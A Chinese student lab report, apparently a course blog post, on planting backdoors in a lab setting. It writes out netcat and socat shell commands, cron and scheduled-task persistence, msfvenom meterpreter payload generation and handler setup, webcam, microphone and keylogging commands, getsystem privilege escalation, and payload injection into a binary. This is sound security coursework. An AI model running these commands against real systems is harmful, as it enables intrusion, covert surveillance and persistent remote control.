20222405 2024-2025-1 《网络与系统攻防技术》实验二实验报告

1.实验内容

1.1 实践目标

(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

1.2 问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

攻击者通过在网站上放置看似合法的恶意软件,用户下载并运行后,后门程序便会在系统中安装。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

Windows:通过安装一个恶意服务,利用services.msc来启动后门。

Linux:攻击者可以创建或修改系统的crontab任务,使后门程序定时运行。

(3)Meterpreter有哪些给你映像深刻的功能?

可以远程开启目标系统的摄像头或进行屏幕截取,获取敏感信息。

(4)如何发现自己有系统有没有被安装后门?

可以使用网络流量监控工具(如Wireshark)查看是否有未知的外部连接或异常端口打开。

2.实验过程

2.1 任务一 使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

ipconfig查看一下主机的ip地址

然后使用netcat进行连接:

在kali输入命令:nc 192.168.43.214 2405 -e /bin/sh

在主机输入命令:nc.exe -l -p 2405

在主机命令行中输入ls,能正常显示文件名,证明主机已成功获取shell

启动kali的root用户,输入crontab -e,选择第二个/usr/bin/vim.basic

输入后进入文字编辑器,新增命令5 * * * * /bin/netcat 192.168.43.214 2405 -e /bin/sh****

这条命令是在每小时的第5分钟启动任务

输入命令crontab -l查看任务

可以在/var/spool/cron/crontabs中找到root文件

然后在主机的中操作,输入:echo "* * * * * echo "chuzhehao" > /home/kali/20222405.txt" > /var/spool/cron/crontabs/root

每分钟执行一次用“chuzhehao”覆盖文件20222405.txt,再输入crontab -l检查时程表

查看修改之前的文件20222405.txt,内容是20222405

在kali中检查20222405.txt文件,内容成功修改为chuzhehao

2.2 任务二 使用socat获取主机操作Shell,任务计划启动

在主机中输入命令:socat.exe tcp-listen:2405 exec:cmd.exe,pty,stderr

在kali中输入命令:socat - tcp:192.168.43.214:2405

先编写一个程序

在kali中输入命令:schtasks /create /sc minute /mo 1 /tn "20222405chuzhehao" /tr C:\20222405\20222405.exe

每一分钟执行一次程序

回到主机查看正在运行的任务“20222405chuzhehao”,实验成功。

2.3 任务三 在Linux下使用MSF meterpreter生成可执行文件,利用ncat或socat传送到Windows主机并运行获取主机shell

先关闭防火墙

在kali中输入ifconfig获得ip地址172.20.10.9

继续输入命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.9 LPORT=2405 -f exe > 20222405backdoor.exe

主机输入命令:nc 172.20.10.9 12345 >C:\socat\20222405backdoor.exe

kali输入命令nc -lvp 12345</tmp/20222405backdoor.exe

这样就将后门程序传到主机了

在Kali中输入命令msfconsole,然后配置监听模块

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 172.20.10.9

set LPORT 2405

接着输入exploit,运行监听模块,并在主机运行20222405backdoor.exe文件

在kali中输入ls查看主机目录

2.4 任务四 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

接着任务三继续输入命令

record_mic 音频

screenshot 截屏

webcam_snap 拍照

keyscan_start 开始读取键盘记录

keyscan_dump 结束读取键盘记录

接下来尝试提权

继续输入

getuid 查看当前用户

getsystem 提权指令

2.5 任务五 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

在kali中输入命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.20.10.9 LPORT=2405 -x /home/kali/pwn1 -f elf > pwn2405

接下来赋予pwn2405权限

接下来重现监听过程

输入命令

msfconsole

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set LHOST 172.20.10.9

set LPORT 2405

exploit

打开另一个终端输入命令./pwn2405运行pwn2405

回到刚才的终端,输入ls确认连接,成功实现远程控制shell

3.问题及解决方案

问题1:后门程序无法传入主机

问题1解决方案:

kali输入命令:nc -lvp 12345</tmp/20222405backdoor.exe

主机输入命令:nc 172.20.10.9 12345 >C:\socat\20222405backdoor.exe

问题2:Kali中msf拿shell后中文乱码

问题2解决方案:输入chcp 65501即可

4.学习感悟、思考等

实验二的任务很多,顺着坐下来其实还算并比较顺利,但比较困扰我的是我在任务三卡了很长时间,试了很多种方法都没办法传输后门程序,于是只好换个思路试一下,好在最后成功了,但之前连接不上的原因我不是很清楚,也没有找到解决方法,这就比较玄学了,甚至有的时候遇到问题重启虚拟机问题就解决了,这个插曲困扰了我很长时间

通过这次实验我收获了很多,我学会了netcat、socat、msf等工具的用法,最让我印象深刻的是通过工具居然可以操控别人的摄像头,还能拍照,感觉非常的高级,同时也让我感觉到网络攻击其实离我们并没有那么遥远,所以我们要提高警惕,加强防范,避免隐私信息泄露。

posted @ 2024-10-18 09:42  20222405楚喆皓  阅读(38)  评论(0编辑  收藏  举报